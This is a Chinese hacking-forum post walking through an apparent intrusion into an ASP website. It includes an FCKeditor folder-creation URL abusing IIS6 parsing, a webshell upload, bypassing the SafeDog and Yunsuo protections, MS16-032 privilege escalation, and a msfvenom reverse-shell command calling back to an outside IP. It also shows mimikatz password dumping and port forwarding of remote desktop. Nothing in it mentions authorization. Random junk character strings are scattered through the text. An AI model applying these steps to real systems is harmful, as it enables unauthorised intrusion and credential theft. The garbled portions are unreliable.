找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2373|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# }) V9 p4 h+ A( h' c4 Z- k

4 N" S( X* j, A: O% S( q% k2 Q& g& X1 j$ }! q. o- F7 [3 V2 K r3 K# t3 Q4 J- P8 w5 A% M& i2 E' U3 f' B2 e# I- }0 L! M# m# E* F% t6 z) ]7 l9 x) P, ~
6 E% }- M- t$ _! i

9 F: O! f$ T* N3 _5 p; Q/ L
, j8 m: F( E; v! f; E! M! R一、 利用getwebshell
1 Q2 @. m5 u2 ]3 u4 D: v* D' g
! m+ `$ d1 k/ r* G+ ] 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ `* x+ M( d! q
, J$ E- r# O6 C1 H2 k222.png
" R% b% v# b: i ~4 N( j下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
8 _" K2 H* M% C( z! V6 O9 ~$ ?0 n7 r333.png
9 z1 z9 I6 h% | 下面我们构造一个asp目录,如: # |9 d, k3 A& f. \7 H9 @9 t( A

0 F5 l0 V$ U( g

0 o% T+ U( A+ y' }4 v5 Z4 F1 p http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 % e5 V# n- y% R; z) k( u

( _, a; ^( R0 t* d* ?

. C+ z* m9 E7 u$ s$ a8 q# F 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
1 K8 L) b9 J1 o7 j1 T) M: O
( A N' E2 p+ _1 t4 y一、 绕过安全狗云锁提权并且加账号
; R5 J' K6 ?$ O5 ?3 r444.png
/ w8 E3 K y- v3 f1 m; y0 m 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
$ F5 g$ {2 t( U7 x! [: G
' \7 l5 ?9 ~2 Q. X' G- Z7 G: ^如图:
1 e Z w, l# t555.png
1 Q# ?( I4 `* e, \: y然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
2 [3 c7 y+ \; H& L& D5 C* {
$ l. J$ O) ]8 _, J0 l 一、 利用metasploit
0 Y: |3 Q$ q, D) J7 l/ e; j7 c6 F+ A
$ _% w+ @, b* K; x% x- D! W8 t+ L首先用pentestbox生成一个64位的payload如下命令
9 L2 |& ]5 K q1 o' L3 s
8 }9 i3 g* B7 V/ ~" E. m" r; Y! }msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
( u$ R/ j+ x' [5 q- e& `0 `0 B
8 p, h; X. `4 O/ l为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
, ]( _/ y, c, m4 v 11.png
# ?- |6 n1 _& ^& C 下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
- W; f, H( q/ Z6 _& K 13.png
; O6 Q, N/ D2 z- u下面我们来做一个监听如下命令:
6 q5 ?8 b* W, z, _8 [$ E
/ t2 ^8 m T( { \% U3 A* Y portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
/ Q3 Z0 s& b4 q4 h' s* h 18.png " u& A3 ^) g: D5 l+ X9 o

5 W/ n+ y8 M' r# G
" r: Q$ j2 M% S% q. a( x# N

h- s$ B" m5 O# P1 O

# j5 y: d5 e& F* X) q
- u) P1 Q: G- m% {8 j7 g
$ S% k6 ?: @) g" L. E $ K$ m1 Z5 V! W

8 d1 H' n) F( {
+ e3 j6 w) w/ f . F4 F0 A- \# V

8 W5 T" {! X `( }$ A
) t) ]3 Q; |" V& t

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表